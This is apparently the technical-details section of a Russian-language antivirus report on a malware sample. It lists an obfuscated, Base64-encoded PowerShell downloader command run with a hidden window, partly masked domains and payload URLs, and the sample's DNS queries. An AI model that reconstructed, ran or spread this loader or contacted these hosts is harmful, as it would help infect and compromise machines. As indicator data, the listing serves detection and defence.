Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABWAHcAegAzAHAAdgBjAD0AKAAnAEgAJwArACcAdAAnACsAKAAnADcAeQBkACcAKwAnAHkAbgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAcgBwAHIAbwBGAGkAbABlAFwAVgByAFoAMg...
- 'al##tune.uk':80
- 'om##ech.tk':443
- http://sh###iushu.cn/3ls806/1rVeMNHQ/
- http://ss###rseas.co/wp-content/k/
- http://ah####designer.com/wp-admin/6poF/
- DNS ASK 91##ma.cn
- DNS ASK sh###iushu.cn
- DNS ASK ss###rseas.co
- DNS ASK pe####alservice.vip
- DNS ASK ah####designer.com
- DNS ASK al##tune.uk
- DNS ASK om##ech.tk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABWAHcAegAzAHAAdgBjAD0AKAAnAEgAJwArACcAdAAnACsAKAAnADcAeQBkACcAKwAnAHkAbgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAcgBwAHIAbwBGAGkAbABlAFwAVgByAFoAMg...' (со скрытым окном)